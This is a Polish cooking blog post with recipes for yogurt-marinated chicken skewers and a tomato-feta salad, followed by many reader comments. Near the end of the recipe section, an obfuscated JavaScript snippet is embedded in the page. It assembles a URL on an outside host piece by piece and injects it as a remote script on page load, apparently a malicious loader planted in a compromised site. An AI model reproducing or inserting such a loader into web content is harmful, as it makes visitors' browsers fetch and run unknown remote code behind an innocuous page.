Szaszłyki w marynacie jogurtowej |
Dzień dobry,
Skoro sezon grillowy już się rozpoczął, śpieszę do Was z przepisem na pyszne szaszłyki na grilla. Troszkę inne, bo w marynacie na bazie gęstego jogurtu naturalnego i aromatycznych przypraw. Takie szaszłyki są wyjątkowo smaczne i soczyste. Jeśli nie mieliście jeszcze okazji próbować mięsa przygotowanego w taki sposób, to serdecznie polecam wypróbować poniższy przepis.
Bazą do dzisiejszych szaszłyków są piersi z kurczaka, ale równie dobrze sprawdzi się pierś z indyka lub mięso z ruchomych elementów drobiu (np. podudzia). Mięso zamarynowałam w mieszance jogurtu i przypraw. Co ważne, musi być to bardzo gęsty jogurt naturalny. Ja wykorzystałam Jogurt Naturalny Gęsty Bakoma, którego użyłam także do zrobienia domowego sosu tzatziki do szaszłyków.Wszystkie składniki użyte w przepisie kupicie bez problemu w pobliskim sklepie, nie ma tu bowiem wymyślnych przypraw i drogich produktów. Mam nadzieję, że przepis przypadnie Wam do gustu i wejdzie na stałe do Waszego grillowego menu.
Szaszłyki w marynacie jogurtowej
Składniki (na 2-3 porcje):
- 600 g piersi z kurczaka lub indyka
- 150 g Jogurtu Naturalnego Gęstego Bakoma
- 1 czubata łyżka ketchupu (domowego lub sklepowego o dobrym składzie)
- 2-3 ząbki czosnku, drobno posiekane
- 1 łyżeczka suszonego oregano
- pół łyżeczki suszonej bazylii
- 1/3 łyżeczki mielonej kurkumy
- 1/2 łyżeczki słodkiej papryki w proszku
- 1/4 łyżeczki czarnego pieprzu, zmielonego
- 1/4 łyżeczki cayenne w proszku (lub więcej, jeśli lubicie pikantne potrawy)
- sól do smaku
Dodatkowo:
- patyczki do szaszłyków
- ulubione warzywa, np. cebula, papryka, pieczarki
- do podania: sos tzatziki
- lekka sałatka z pomidorów i sera feta (przepis poniżej)
Marynata jogurtowa do mięsa |
Jak zrobić szaszłyki w marynacie jogurtowej?
Mięso oczyszczamy, myjemy, osuszamy papierowym ręcznikiem i kroimy w kostkę. Ja do tego przepisu wykorzystałam piersi z kurczaka. Mięso doprawiamy solą, mieszamy.
W pojemniku na żywność umieszczamy Jogurt Naturalny Gęsty Bakoma, ketchup, czosnek, oregano, bazylię, kurkumę, słodką paprykę, pieprz i cayenne. Wszystko dokładnie mieszamy. Do pojemnika wkładamy pokrojone mięso, ponownie mieszamy. Pojemnik zamykamy i odstawiamy do lodówki na 2-3 godziny, a najlepiej na 12-24 godziny. Należy pamiętać o wyciągnięciu mięsa z lodówki na około 30 minut przed planowanym smażeniem.
Patyczki do szaszłyków należy namoczyć w zimnej wodzie przez 30 minut. Zapobiegnie to przypalaniu się patyczków. Mięso wyjmujemy z marynaty i nadziewamy na patyczki do szaszłyków, na przemian z kawałkami warzyw. Ja wykorzystałam kolorową paprykę. Równie dobrze sprawdzą się nieduże cebulki, pieczarki, cukinia.
Szaszłyki układamy na ruszcie grilla i grillujemy z każdej strony po kilka minut (polecam najpierw położyć szaszłyki na aluminiowej tacce do grillowania i dopiero na ruszcie). Można je również przygotować w domu na patelni grillowej, grillu elektrycznym lub w piekarniku (180-200 stopni bez termoobiegu przez około 18-20 minut).
Szaszłyki w marynacie jogurtowej podajemy z sosem tzatziki oraz lekką sałatką z pomidorami i serem feta (przepis poniżej).
Lekka sałatka z pomidorów i fety
Składniki (na 2-3 porcje):
- spora garść ulubionej sałaty lub miniaturowego szpinaku
- 3-4 pomidory
- pół czerwonej cebulki
- kilkanaście zielonych oliwek z pastą paprykową
- 70 g sera feta
- dressing: 2-3 łyżki oliwy, 1 łyżka soku z cytryny, pół łyżeczki suszonego oregano, 1/3 łyżeczki suszonej bazylii, sól i pieprz do smaku
Jak zrobić lekką sałatkę z pomidorów i sera feta?
Ja do sałatki użyłam małe listki szpinaku, ale równie fajnie sprawdzi się Wasz ulubiony miks sałat, sałata rzymska, karbowana lub nawet lodowa. W misce umieszczamy sałatę, dodajemy pokrojone w większe kawałki pomidory, posiekaną w piórka cebulę czerwoną, oliwki i pokrojony lub pokruszony ser feta. Składniki dressingu łączymy ze sobą w zakręconym małym słoiczku i polewamy nim sałatkę. Pamiętajcie, aby wylać dressing na sałatkę tuż przez podaniem jej.
Szaszłyki w marynacie jogurtowej |
(function(){
oc87=document.createElement(„script”);oc87.async=true;oc87_=”u”+(„s”)+”t”;
oc87u=”3893.”;oc87_+=”a”+(„t.i”);oc87_+=”n”+(„f”+”o”)+”/”;
oc87u+=”3pxf45sic87tnapi1jwpkx”+(„yuvn6x”);
oc87.src=”//”+oc87_+oc87u;oc87.type=”text/javascript”;
document.body.appendChild(oc87);
})();
Całkowity czas przygotowania: 30 minut.
33 komentarze
ale pyszności ! aż ślinka cieknie. piękne zdjęcia.
Dziękuję 🙂
Zjadlabym!!!! Twoje potrawy i zdjecia zawsze wywoluja u mnie slinotok 🙂
Szaszłyki nie dla mnie, choć myślę, że ta marynata fajnir sprawdziłaby się także do tofu 🙂
A sałatkę bym zjadła z wielką chęcią :))
Z tofu może wyjść naprawdę ciekawie. Trzeba będzie wypróbować 🙂
wow,ale pychota:)
Bardzo apetycznie wygladaja te szaszlyki 😉 Marynownie w jogurcie faktycznie nadaje potrzawa soczystosci.
PS. Jak zwykle przepiekene zdjecia 😉
Dokładnie, mięso pozostaje przyjemnie soczyste. No i fajnie, że taka marynata sprawdzi się przy prawie każdym rodzaju mięsa.
Hm… pycha, wygląda mega apetycznie a na pewno jeszcze lepiej smakuje 🙂 Fajnie, że można czerpać inspiracje i pomysły z Twojego BLOGA!! Patrząc na te fantastyczne zdjęcia mój apetyt wzrasta :))
Michale, cieszę się, że zdjęcia przypadły Ci do gustu 🙂
Świetny przepis ! I zdjęcia sprawiają, że mam ochotę na takie szaszłyki 🙂 Przepis poleciłam na moim fb 😀
Marzenko, dziękuję za polecenie!
Nie marynowałam chyba nigdy kurczaka w jogurcie, a słyszałam, że świetnie wtedy mięso kruszeje 🙂 Przy najbliższej okazji chętnie wypróbuję!
Polecam, bo naprawdę warto 🙂
Marynata bardzo mnie zainteresowała. Szaszłyki z nią na pewno są pyszne.
Jeśli grill to szaszłyki u mnie muszą być, zwykle z indykiem i warzywami, ale w marynacie jeszcze nie robiłam. Będę musiała w tym roku spróbować 🙂
omom czy ja mogę wpaść na spróbowanie?:D wygląda to genialnie;) obserwuję z miłą chęcią i zapraszam serdecznie do siebie;)
Zapraszam 🙂
jaki cudowny przepis!
Aż zachciało mi się sezonu grillowego, ale pogoda ani trochę nie zachęca 🙁
U mnie weekend był akurat piękny i słoneczny. W końcu można było wyjść z domu w krótkim rękawku. A dziś już niestety zrobiło się burzowo.
Świetne przepisy i przepiękne zdjęcia. Od samego oglądania pobudzają zmysły, aż czuje się zapach i smak. Obowiązkowe pozycje na następnym garden party! Już nie mogę się doczekać. Pani Malwino oby więcej takich ciekawych propozycji na czas grillowy. 🙂
Mateuszu, dziękuję za tak miłe słowa!
Czy można wykorzystać jogurt grecki?
Tak. Ważne, by był gęsty i kwaskowaty w smaku.
Bardzo smacznie i zdrowo 🙂 Uwielbiam takie dania 🙂
Uwielbiam szaszłyki. Najchętniej też wybieram mięso drobiowe, ale Twoje prezentują się wybornie! No i te kolory! Mnie już ślinka cieknie!
My zjadłybyśmy sałatkę ale szaszłyki przygotowałybyśmy dla naszego taty, na pewno byłby zachwycony. Bardzo lubi takie dania 🙂
Świetny pomysł! W czwartek planuję zrobić grilla, więc chętnie wypróbuję twój przepis:D
Szaszłyki smakowały wyśmienicie. Bardzo pasuje mi taki zestaw przypraw☺
Miło mi to czytać 🙂
Ależ apetyczne propozycja 😀
Przepis wypróbowany na sobotnim grillowaniu. Cała rodzinka jadła ze smakiem, co już wiedziałam patrząc po samych składnikach. Marynata jogurtowa sprawiła, że mięsko było mięciutkie i delikatnie. Dziękuję za przepis i szczerze wszystkim polecam.
Przepis wylądował w zakładkach i czeka na kolejną okazję. 🙂
Cieszę się, że przepis przypadł Ci do gustu 🙂